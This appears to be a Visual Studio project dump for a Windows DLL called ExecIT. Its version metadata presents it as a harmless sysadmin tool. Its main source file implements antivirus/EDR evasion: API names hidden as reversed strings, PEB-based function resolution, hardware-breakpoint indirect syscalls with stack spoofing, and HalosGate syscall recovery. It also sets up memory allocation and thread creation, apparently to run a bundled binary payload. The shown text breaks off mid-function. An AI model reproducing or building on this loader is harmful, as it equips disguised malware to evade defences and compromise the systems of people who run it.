[
  {
    "path": "ExecIT/ExecIT.vcxproj",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup Label=\"ProjectConfigurations\">\n    <ProjectConfiguration Include=\"Debug|Win32\">\n      <Configuration>Debug</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|Win32\">\n      <Configuration>Release</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Debug|x64\">\n      <Configuration>Debug</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|x64\">\n      <Configuration>Release</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n  </ItemGroup>\n  <PropertyGroup Label=\"Globals\">\n    <VCProjectVersion>16.0</VCProjectVersion>\n    <Keyword>Win32Proj</Keyword>\n    <ProjectGuid>{0f7a1d0f-1c36-4be6-9c0b-39a15688cd7a}</ProjectGuid>\n    <RootNamespace>ExecIT</RootNamespace>\n    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>DynamicLibrary</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v143</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>DynamicLibrary</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v143</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"Configuration\">\n    <ConfigurationType>DynamicLibrary</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v143</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\n    <ConfigurationType>DynamicLibrary</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v143</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\n  <ImportGroup Label=\"ExtensionSettings\">\n  </ImportGroup>\n  <ImportGroup Label=\"Shared\">\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <PropertyGroup Label=\"UserMacros\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <TargetName>ExecIT</TargetName>\n  </PropertyGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <SDLCheck>true</SDLCheck>\n      <PreprocessorDefinitions>WIN32;_DEBUG;EXECIT_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <ConformanceMode>true</ConformanceMode>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EnableUAC>false</EnableUAC>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <SDLCheck>true</SDLCheck>\n      <PreprocessorDefinitions>WIN32;NDEBUG;EXECIT_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <ConformanceMode>true</ConformanceMode>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EnableUAC>false</EnableUAC>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <SDLCheck>true</SDLCheck>\n      <PreprocessorDefinitions>_DEBUG;EXECIT_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <ConformanceMode>true</ConformanceMode>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EnableUAC>false</EnableUAC>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <SDLCheck>true</SDLCheck>\n      <PreprocessorDefinitions>NDEBUG;EXECIT_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <ConformanceMode>true</ConformanceMode>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>\n      <Optimization>Disabled</Optimization>\n      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EnableUAC>false</EnableUAC>\n      <Version>1.2</Version>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemGroup>\n    <ClInclude Include=\"framework.h\" />\n    <ClInclude Include=\"pch.h\" />\n    <ClInclude Include=\"resource.h\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClCompile Include=\"dllmain.cpp\" />\n    <ClCompile Include=\"pch.cpp\">\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">Create</PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">Create</PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">Create</PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">Create</PrecompiledHeader>\n    </ClCompile>\n  </ItemGroup>\n  <ItemGroup>\n    <ResourceCompile Include=\"ProjectName.rc\" />\n  </ItemGroup>\n  <ItemGroup>\n    <None Include=\"test1.bin\" />\n  </ItemGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\n  <ImportGroup Label=\"ExtensionTargets\">\n  </ImportGroup>\n</Project>"
  },
  {
    "path": "ExecIT/ExecIT.vcxproj.filters",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup>\n    <Filter Include=\"Source Files\">\n      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>\n      <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>\n    </Filter>\n    <Filter Include=\"Header Files\">\n      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>\n      <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>\n    </Filter>\n    <Filter Include=\"Resource Files\">\n      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>\n      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>\n    </Filter>\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"framework.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"pch.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"resource.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n  </ItemGroup>\n  <ItemGroup>\n    <ClCompile Include=\"dllmain.cpp\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"pch.cpp\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n  </ItemGroup>\n  <ItemGroup>\n    <ResourceCompile Include=\"ProjectName.rc\">\n      <Filter>Resource Files</Filter>\n    </ResourceCompile>\n  </ItemGroup>\n  <ItemGroup>\n    <None Include=\"test1.bin\">\n      <Filter>Resource Files</Filter>\n    </None>\n  </ItemGroup>\n</Project>"
  },
  {
    "path": "ExecIT/ExecIT.vcxproj.user",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <PropertyGroup />\n</Project>"
  },
  {
    "path": "ExecIT/ProjectName.rc",
    "content": "#include <windows.h>\n\nLANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US\n\n/////////////////////////////////////////////////////////////////////// \n// \n// Version\n// \n\nVS_VERSION_INFO VERSIONINFO\n FILEVERSION 1,0,0,1\n PRODUCTVERSION 1,0,0,1\n FILEFLAGSMASK 0x3fL\n#ifdef _DEBUG\n FILEFLAGS 0x1L\n#else\n FILEFLAGS 0x0L\n#endif\n FILEOS 0x40004L\n FILETYPE 0x2L\n FILESUBTYPE 0x0L\nBEGIN\n    BLOCK \"StringFileInfo\"\n    BEGIN\n        BLOCK \"040904b0\"\n        BEGIN\n            VALUE \"Comments\", \"Usefor for SysAdmins\"\n            VALUE \"CompanyName\", \"Max Power Inc\"\n            VALUE \"FileDescription\", \"SysAdmin Tool 123\"\n            VALUE \"FileVersion\", \"1, 0, 0, 5\"\n            VALUE \"InternalName\", \"ExecIT\"\n            VALUE \"LegalCopyright\", \"Copyright (C) Max Power Inc 2024\"\n            VALUE \"OriginalFilename\", \"ExecIT.dll\"\n            VALUE \"ProductName\", \"ExecIT\"\n            VALUE \"ProductVersion\", \"1, 0, 0, 5\"\n        END\n    END\n    BLOCK \"VarFileInfo\"\n    BEGIN\n        VALUE \"Translation\", 0x409, 1200\n    END\nEND"
  },
  {
    "path": "ExecIT/dllmain.cpp",
    "content": "#include <iostream>\n#include <fstream>\n#include \"Windows.h\"\n#include <inttypes.h>\n#include \"pch.h\"\n\n\n\n#define SIZEOF(x) sizeof(x) - 1\n\n#pragma region Defines\n\n#define HWSYSCALLS_DEBUG 0\n#define UP -32\n#define DOWN 32\n#define STACK_ARGS_LENGTH 8\n#define STACK_ARGS_RSP_OFFSET 0x28\n#define X64_PEB_OFFSET 0x60\n\n#pragma endregion\n\n#pragma region Macros\n\n#if HWSYSCALLS_DEBUG == 0\n#define DEBUG_PRINT( STR, ... )\n#else\n#define DEBUG_PRINT( STR, ... ) printf(STR, __VA_ARGS__ ); \n#endif\n\n#pragma endregion\n\n#pragma region Type Defintions\n\ntypedef struct _UNICODE_STRING {\n    USHORT Length;\n    USHORT MaximumLength;\n    PWSTR  Buffer;\n} UNICODE_STRING, * PUNICODE_STRING;\n\ntypedef struct _RTL_USER_PROCESS_PARAMETERS {\n    BYTE           Reserved1[16];\n    PVOID          Reserved2[10];\n    UNICODE_STRING ImagePathName;\n    UNICODE_STRING CommandLine;\n} RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;\n\ntypedef struct _PEB_LDR_DATA {\n    BYTE       Reserved1[8];\n    PVOID      Reserved2[3];\n    LIST_ENTRY InMemoryOrderModuleList;\n} PEB_LDR_DATA, * PPEB_LDR_DATA;\n\ntypedef struct _LDR_DATA_TABLE_ENTRY {\n    PVOID Reserved1[2];\n    LIST_ENTRY InMemoryOrderLinks;\n    PVOID Reserved2[2];\n    PVOID DllBase;\n    PVOID EntryPoint;\n    PVOID Reserved3;\n    UNICODE_STRING FullDllName;\n    BYTE Reserved4[8];\n    PVOID Reserved5[3];\n    union {\n        ULONG CheckSum;\n        PVOID Reserved6;\n    };\n    ULONG TimeDateStamp;\n} LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY;\n\ntypedef struct _PEB {\n    BYTE Reserved1[2];\n    BYTE BeingDebugged;\n    BYTE Reserved2[21];\n    PPEB_LDR_DATA LoaderData;\n    PRTL_USER_PROCESS_PARAMETERS ProcessParameters;\n    BYTE Reserved3[520];\n    PVOID PostProcessInitRoutine;\n    BYTE Reserved4[136];\n    ULONG SessionId;\n} PEB, * PPEB;\n\ntypedef BOOL(WINAPI* GetThreadContext_t)(\n    _In_ HANDLE hThread,\n    _Inout_ LPCONTEXT lpContext\n    );\n\ntypedef BOOL(WINAPI* SetThreadContext_t)(\n    _In_ HANDLE hThread,\n    _In_ CONST CONTEXT* lpContext\n    );\n\n#pragma endregion\n\n#pragma region Function Declerations\n\nBOOL MaskCompare(const BYTE* pData, const BYTE* bMask, const char* szMask);\nDWORD_PTR FindPattern(DWORD_PTR dwAddress, DWORD dwLen, PBYTE bMask, PCHAR szMask);\nDWORD_PTR FindInModule(LPCSTR moduleName, PBYTE bMask, PCHAR szMask);\nUINT64 GetModuleAddress(LPWSTR sModuleName);\nUINT64 GetSymbolAddress(UINT64 moduleBase, const char* functionName);\nUINT64 PrepareSyscall(char* functionName);\nbool SetMainBreakpoint();\nDWORD64 FindSyscallNumber(DWORD64 functionAddress);\nDWORD64 FindSyscallReturnAddress(DWORD64 functionAddress, WORD syscallNumber);\nLONG HWSyscallExceptionHandler(EXCEPTION_POINTERS* ExceptionInfo);\nbool InitHWSyscalls();\nbool DeinitHWSyscalls();\n\n#pragma endregion\n\n#pragma region GlobalVariables\n\nPVOID exceptionHandlerHandle;\nHANDLE myThread;\nHANDLE hNtdll;\nUINT64 ntFunctionAddress;\nUINT64 k32FunctionAddress;\nUINT64 retGadgetAddress;\nUINT64 stackArgs[STACK_ARGS_LENGTH];\nUINT64 callRegGadgetAddress;\nUINT64 callRegGadgetAddressRet;\nchar callRegGadgetValue;\nUINT64 regBackup;\n\n#pragma endregion\n\n\n#pragma region BinaryPatternMatching\n\n\n\n\n\ntypedef struct _OBJECT_ATTRIBUTES\n{\n\tULONG           Length;\n\tHANDLE          RootDirectory;\n\tPUNICODE_STRING ObjectName;\n\tULONG           Attributes;\n\tPVOID           SecurityDescriptor;\n\tPVOID           SecurityQualityOfService;\n} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;\n\n\n\n\ntypedef NTSTATUS(NTAPI* NtAllocateVirtualMemory_t)(\n\tHANDLE             ProcessHandle,\n\tPVOID* BaseAddress,\n\tULONG              ZeroBits,\n\tPULONG             RegionSize,\n\tULONG              AllocationType,\n\tULONG              Protect\n\t);\n\ntypedef NTSTATUS(NTAPI* NtProtectVirtualMemory_t)(\n\tIN HANDLE               ProcessHandle,\n\tIN OUT PVOID* BaseAddress,\n\tIN OUT PULONG           NumberOfBytesToProtect,\n\tIN ULONG                NewAccessProtection,\n\tOUT PULONG              OldAccessProtection\n\t);\n\ntypedef struct _IO_STATUS_BLOCK {\n\tunion {\n\t\tNTSTATUS Status;\n\t\tPVOID    Pointer;\n\t};\n\tULONG_PTR Information;\n} IO_STATUS_BLOCK, * PIO_STATUS_BLOCK;\n\ntypedef VOID(NTAPI* PIO_APC_ROUTINE)(\n\tIN PVOID ApcContext,\n\tIN PIO_STATUS_BLOCK IoStatusBlock,\n\tIN ULONG Reserved\n\t);\n\n\ntypedef NTSTATUS(NTAPI* NtReadFile_t)(\n\tIN    HANDLE           FileHandle,\n\tIN OPTIONAL HANDLE           Event,\n\tIN OPTIONAL PIO_APC_ROUTINE  ApcRoutine,\n\tIN OPTIONAL PVOID            ApcContext,\n\tOUT    PIO_STATUS_BLOCK IoStatusBlock,\n\tOUT    PVOID            Buffer,\n\tIN     ULONG            Length,\n\tIN OPTIONAL PLARGE_INTEGER   ByteOffset,\n\tIN OPTIONAL PULONG           Key\n\t);\n\ntypedef NTSTATUS(NTAPI* NtCreateThreadEx_t)(\n\tOUT PHANDLE hThread,\n\tIN ACCESS_MASK DesiredAccess,\n\tIN PVOID ObjectAttributes,\n\tIN HANDLE ProcessHandle,\n\tIN PVOID lpStartAddress,\n\tIN PVOID lpParameter,\n\tIN ULONG Flags,\n\tIN SIZE_T StackZeroBits,\n\tIN SIZE_T SizeOfStackCommit,\n\tIN SIZE_T SizeOfStackReserve,\n\tOUT PVOID lpBytesBuffer);\n\ntypedef NTSTATUS(NTAPI* NtWriteVirtualMemory)(\n\tIN HANDLE pHandle,\n\tIN PVOID baseAddress,\n\tIN LPCVOID lpBuffer,\n\tIN SIZE_T nSize,\n\tOUT SIZE_T* lpNumberOfBytesWritten\n\t);\n\ntypedef NTSTATUS(NTAPI* NtWaitForSingleObject)(\n\tIN HANDLE Handle,\n\tIN BOOLEAN Alertable,\n\tIN PLARGE_INTEGER Timeout\n\t);\n\nvoid reverseStr(char* str, int nSize)\n{\n\n\t// Swap character starting from two\n\t// corners\n\tfor (int i = 0; i < nSize / 2; i++)\n\t\tstd::swap(str[i], str[nSize - i - 1]);\n\treturn;\n}\n\n\nchar cNtAllocateVirtualMemory[] = \"yromeMlautriVetacollAtN\";\nchar cNtCreateThreadEx[] = \"xEdaerhTetaerCtN\";\nchar cNtWaitForSingleObject[] = \"tcejbOelgniSroFtiaWtN\";\n\n\nchar kernelbase[] = \"lld.esablenrek\";\nchar getContext[] = \"txetnoCdaerhTteG\";\nchar setContext[] = \"txetnoCdaerhTteS\";\n\nvoid reverseStr2(char* str, int nSize)\n{\n\n    // Swap character starting from two\n    // corners\n    for (int i = 0; i < nSize / 2; i++)\n        std::swap(str[i], str[nSize - i - 1]);\n    return;\n}\n\nBOOL MaskCompare(const BYTE* pData, const BYTE* bMask, const char* szMask)\n{\n    for (; *szMask; ++szMask, ++pData, ++bMask)\n        if (*szMask == 'x' && *pData != *bMask)\n            return FALSE;\n    return TRUE;\n}\n\nDWORD_PTR FindPattern(DWORD_PTR dwAddress, DWORD dwLen, PBYTE bMask, PCHAR szMask)\n{\n    for (DWORD i = 0; i < dwLen; i++)\n        if (MaskCompare((PBYTE)(dwAddress + i), bMask, szMask))\n            return (DWORD_PTR)(dwAddress + i);\n\n    return 0;\n}\n\nDWORD_PTR FindInModule(LPCSTR moduleName, PBYTE bMask, PCHAR szMask)\n{\n    DWORD_PTR dwAddress = 0;\n    PIMAGE_DOS_HEADER imageBase = (PIMAGE_DOS_HEADER)GetModuleHandleA(moduleName);\n\n    if (!imageBase)\n        return 0;\n\n    DWORD_PTR sectionOffset = (DWORD_PTR)imageBase + imageBase->e_lfanew + sizeof(IMAGE_NT_HEADERS);\n\n    if (!sectionOffset)\n        return 0;\n\n    PIMAGE_SECTION_HEADER textSection = (PIMAGE_SECTION_HEADER)(sectionOffset);\n    dwAddress = FindPattern((DWORD_PTR)imageBase + textSection->VirtualAddress, textSection->SizeOfRawData, bMask, szMask);\n    return dwAddress;\n}\n\n#pragma endregion\n\n#pragma region PEBGetProcAddress\n\nUINT64 GetModuleAddress(LPWSTR moduleName) {\n    PPEB peb = (PPEB)__readgsqword(X64_PEB_OFFSET);\n    LIST_ENTRY* ModuleList = NULL;\n\n    if (!moduleName)\n        return 0;\n\n    for (LIST_ENTRY* pListEntry = peb->LoaderData->InMemoryOrderModuleList.Flink;\n        pListEntry != &peb->LoaderData->InMemoryOrderModuleList;\n        pListEntry = pListEntry->Flink) {\n\n        PLDR_DATA_TABLE_ENTRY pEntry = CONTAINING_RECORD(pListEntry, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);\n\n        if (wcsstr(pEntry->FullDllName.Buffer, moduleName)) {\n            return (UINT64)pEntry->DllBase;\n        }\n    }\n    return 0;\n}\n\nUINT64 GetSymbolAddress(UINT64 moduleBase, const char* functionName) {\n    UINT64 functionAddress = 0;\n    PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)moduleBase;\n\n    // Checking that the image is valid PE file.\n    if (dosHeader->e_magic != IMAGE_DOS_SIGNATURE) {\n        return 0;\n    }\n\n    PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)(moduleBase + dosHeader->e_lfanew);\n\n    if (ntHeaders->Signature != IMAGE_NT_SIGNATURE) {\n        return functionAddress;\n    }\n\n    IMAGE_OPTIONAL_HEADER optionalHeader = ntHeaders->OptionalHeader;\n\n    if (optionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress == 0) {\n        return functionAddress;\n    }\n\n    // Iterating the export directory.\n    PIMAGE_EXPORT_DIRECTORY exportDirectory = (PIMAGE_EXPORT_DIRECTORY)(moduleBase + optionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);\n\n    DWORD* addresses = (DWORD*)(moduleBase + exportDirectory->AddressOfFunctions);\n    WORD* ordinals = (WORD*)(moduleBase + exportDirectory->AddressOfNameOrdinals);\n    DWORD* names = (DWORD*)(moduleBase + exportDirectory->AddressOfNames);\n\n    for (DWORD j = 0; j < exportDirectory->NumberOfNames; j++) {\n        if (_stricmp((char*)(moduleBase + names[j]), functionName) == 0) {\n            functionAddress = moduleBase + addresses[ordinals[j]];\n            break;\n        }\n    }\n\n    return functionAddress;\n}\n\n#pragma endregion\n\n#pragma region HalosGate\n\nDWORD64 FindSyscallNumber(DWORD64 functionAddress) {\n    // @sektor7 - RED TEAM Operator: Windows Evasion course - https://blog.sektor7.net/#!res/2021/halosgate.md\n    WORD syscallNumber = 0;\n\n    for (WORD idx = 1; idx <= 500; idx++) {\n        // check neighboring syscall down\n        if (*((PBYTE)functionAddress + idx * DOWN) == 0x4c\n            && *((PBYTE)functionAddress + 1 + idx * DOWN) == 0x8b\n            && *((PBYTE)functionAddress + 2 + idx * DOWN) == 0xd1\n            && *((PBYTE)functionAddress + 3 + idx * DOWN) == 0xb8\n            && *((PBYTE)functionAddress + 6 + idx * DOWN) == 0x00\n            && *((PBYTE)functionAddress + 7 + idx * DOWN) == 0x00) {\n            BYTE high = *((PBYTE)functionAddress + 5 + idx * DOWN);\n            BYTE low = *((PBYTE)functionAddress + 4 + idx * DOWN);\n\n            syscallNumber = (high << 8) | low - idx;\n            break;\n        }\n\n        // check neighboring syscall up\n        if (*((PBYTE)functionAddress + idx * UP) == 0x4c\n            && *((PBYTE)functionAddress + 1 + idx * UP) == 0x8b\n            && *((PBYTE)functionAddress + 2 + idx * UP) == 0xd1\n            && *((PBYTE)functionAddress + 3 + idx * UP) == 0xb8\n            && *((PBYTE)functionAddress + 6 + idx * UP) == 0x00\n            && *((PBYTE)functionAddress + 7 + idx * UP) == 0x00) {\n            BYTE high = *((PBYTE)functionAddress + 5 + idx * UP);\n            BYTE low = *((PBYTE)functionAddress + 4 + idx * UP);\n\n            syscallNumber = (high << 8) | low + idx;\n            break;\n        }\n\n    }\n\n    if (syscallNumber == 0)\n\n        return syscallNumber;\n}\n\nDWORD64 FindSyscallReturnAddress(DWORD64 functionAddress, WORD syscallNumber) {\n    // @sektor7 - RED TEAM Operator: Windows Evasion course - https://blog.sektor7.net/#!res/2021/halosgate.md\n    DWORD64 syscallReturnAddress = 0;\n\n    for (WORD idx = 1; idx <= 32; idx++) {\n        if (*((PBYTE)functionAddress + idx) == 0x0f && *((PBYTE)functionAddress + idx + 1) == 0x05) {\n            syscallReturnAddress = (DWORD64)((PBYTE)functionAddress + idx);\n            break;\n        }\n    }\n\n    if (syscallReturnAddress == 0)\n\n        return syscallReturnAddress;\n}\n\n#pragma endregion\n\nUINT64 PrepareSyscall(char* functionName) {\n    return ntFunctionAddress;\n}\n\nbool SetMainBreakpoint() {\n    // Dynamically find the GetThreadContext and SetThreadContext functions\n    reverseStr2(getContext, SIZEOF(getContext));\n    GetThreadContext_t pGetThreadContext = (GetThreadContext_t)GetSymbolAddress(GetModuleAddress((LPWSTR)L\"KERN\"), getContext);\n    reverseStr2(setContext, SIZEOF(setContext));\n    SetThreadContext_t pSetThreadContext = (SetThreadContext_t)GetSymbolAddress(GetModuleAddress((LPWSTR)L\"KERN\"), setContext);\n\n    DWORD old = 0;\n\n    CONTEXT ctx = { 0 };\n    ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS;\n\n    // Get current thread context\n    pGetThreadContext(myThread, &ctx);\n\n    // Set hardware breakpoint on PrepareSyscall function\n    ctx.Dr0 = (UINT64)&PrepareSyscall;\n    ctx.Dr7 |= (1 << 0);\n    ctx.Dr7 &= ~(1 << 16);\n    ctx.Dr7 &= ~(1 << 17);\n    ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS;\n\n    // Apply the modified context to the current thread\n    if (!pSetThreadContext(myThread, &ctx)) {\n        return false;\n    }\n\n    return true;\n}\n\nLONG HWSyscallExceptionHandler(EXCEPTION_POINTERS* ExceptionInfo) {\n    if (ExceptionInfo->ExceptionRecord->ExceptionCode == EXCEPTION_SINGLE_STEP) {\n        if (ExceptionInfo->ContextRecord->Rip == (DWORD64)&PrepareSyscall) {\n\n            // Find the address of the syscall function in ntdll we got as the first argument of the PrepareSyscall function\n            ntFunctionAddress = GetSymbolAddress((UINT64)hNtdll, (const char*)(ExceptionInfo->ContextRecord->Rcx));\n\n            // Move breakpoint to the NTAPI function;\n            ExceptionInfo->ContextRecord->Dr0 = ntFunctionAddress;\n        }\n        else if (ExceptionInfo->ContextRecord->Rip == (DWORD64)ntFunctionAddress) {\n\n            // Create a new stack to spoof the kernel32 function address\n            // The stack size will be 0x70 which is compatible with the RET_GADGET we found.\n            // sub rsp, 70\n            ExceptionInfo->ContextRecord->Rsp -= 0x70;\n            // mov rsp, REG_GADGET_ADDRESS\n            *(PULONG64)(ExceptionInfo->ContextRecord->Rsp) = retGadgetAddress;\n\n            // Copy the stack arguments from the original stack\n            for (size_t idx = 0; idx < STACK_ARGS_LENGTH; idx++)\n            {\n                const size_t offset = idx * STACK_ARGS_LENGTH + STACK_ARGS_RSP_OFFSET;\n                *(PULONG64)(ExceptionInfo->ContextRecord->Rsp + offset) = *(PULONG64)(ExceptionInfo->ContextRecord->Rsp + offset + 0x70);\n            }\n\n            DWORD64 pFunctionAddress = ExceptionInfo->ContextRecord->Rip;\n\n            char nonHookedSyscallBytes[] = { 0x4C,0x8B,0xD1,0xB8 };\n            if (FindPattern(pFunctionAddress, 4, (PBYTE)nonHookedSyscallBytes, (PCHAR)\"xxxx\")) {\n            }\n            else {\n\n\n                WORD syscallNumber = FindSyscallNumber(pFunctionAddress);\n\n                if (syscallNumber == 0) {\n                    ExceptionInfo->ContextRecord->Dr0 = callRegGadgetAddressRet;\n                    return EXCEPTION_CONTINUE_EXECUTION;\n                }\n\n                DWORD64 syscallReturnAddress = FindSyscallReturnAddress(pFunctionAddress, syscallNumber);\n\n                if (syscallReturnAddress == 0) {\n                    ExceptionInfo->ContextRecord->Dr0 = callRegGadgetAddressRet;\n                    return EXCEPTION_CONTINUE_EXECUTION;\n                }\n\n                // mov r10, rcx\n                ExceptionInfo->ContextRecord->R10 = ExceptionInfo->ContextRecord->Rcx;\n                //mov eax, SSN\n                